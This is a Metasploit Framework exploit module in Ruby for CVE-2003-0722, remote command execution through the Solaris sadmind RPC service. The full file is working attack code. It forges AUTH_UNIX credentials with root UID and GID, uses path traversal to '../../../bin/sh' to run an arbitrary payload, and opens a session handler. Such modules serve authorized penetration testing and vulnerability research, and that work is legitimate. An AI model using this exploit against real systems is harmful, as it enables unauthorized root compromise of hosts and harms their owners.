## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ ## require 'msf/core' module Msf class Exploits::Solaris::Sunrpc::SadmindExec < Msf::Exploit::Remote include Exploit::Remote::SunRPC def initialize(info = {}) super(update_info(info, 'Name' => 'Solaris sadmind Command Execution', 'Description' => %q{ This exploit targets a weakness in the default security settings of the sadmind RPC application. This server is installed and enabled by default on most versions of the Solaris operating system. Vulnerable systems include solaris 2.7, 8, and 9 }, 'Author' => [ 'vlad902 ', 'hdm', 'cazz' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ ['BID', '8615'], ['CVE', '2003-0722'], ['OSVDB', '4585'], ['URL', 'http://lists.insecure.org/lists/vulnwatch/2003/Jul-Sep/0115.html'], ['MIL', '64'] ], 'Privileged' => true, 'Platform' => ['unix', 'solaris'], 'Arch' => ARCH_CMD, 'Payload' => { 'Space' => 2000, 'BadChars' => "\x00", 'DisableNops' => true, }, 'Targets' => [ ['Automatic', { }], ], 'DisclosureDate' => 'Sep 13 2003', 'DefaultTarget' => 0 )) register_options( [ OptString.new('HOSTNAME', [false, 'Remote hostname', nil]), OptInt.new('GID', [false, 'GID to emulate', 0]), OptInt.new('UID', [false, 'UID to emulate', 0]) ], self.class ) end def exploit sunrpc_create('udp', 100232, 10) sunrpc_authunix('localhost', datastore['UID'], datastore['GID'], []) if !datastore['HOSTNAME'] print_status('attempting to determine hostname') response = sadmind_request(rand_text_alpha(rand(10) + 1), "true") if !response print_error('no response') return end match = /Security exception on host (.*)\. USER/.match(response) if match hostname = match.captures[0] print_status("found hostname: #{hostname}") else print_error('unable to determine hostname') return end else hostname = datastore['HOSTNAME'] end response = sadmind_request(hostname, payload.encoded) sunrpc_destroy if /Security exception on host/.match(response) print_error('exploit failed') return else print_good('exploit did not give us an error, this is good...') sleep(1) handler end end def sadmind_request(host, command) header = XDR.encode(0) * 7 + XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10, \ 4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0, \ host, 'system', '../../../bin/sh') body = do_int('ADM_FW_VERSION', 1) + do_string('ADM_LANG', 'C') + do_string('ADM_REQUESTID', '00009:000000000:0') + do_string('ADM_CLASS', 'system') + do_string('ADM_CLASS_VERS', '2.1') + do_string('ADM_METHOD', '../../../bin/sh') + do_string('ADM_HOST', host) + do_string('ADM_CLIENT_HOST', host) + do_string('ADM_CLIENT_DOMAIN', '') + do_string('ADM_TIMEOUT_PARMS', 'TTL=0 PTO=20 PCNT=2 PDLY=30') + do_int('ADM_FENCE', 0) + do_string('X', '-c') + do_string('Y', command) + XDR.encode('netmgt_endofargs') request = header + XDR.encode(header.length + body.length - 326) + body ret = sunrpc_call(1, request) return XDR.decode!(ret, Integer, Integer, String)[2] end def do_string(str1, str2) XDR.encode(str1, 9, str2.length + 1, str2, 0, 0) end def do_int(str, int) XDR.encode(str, 3, 4, int, 0, 0) end end end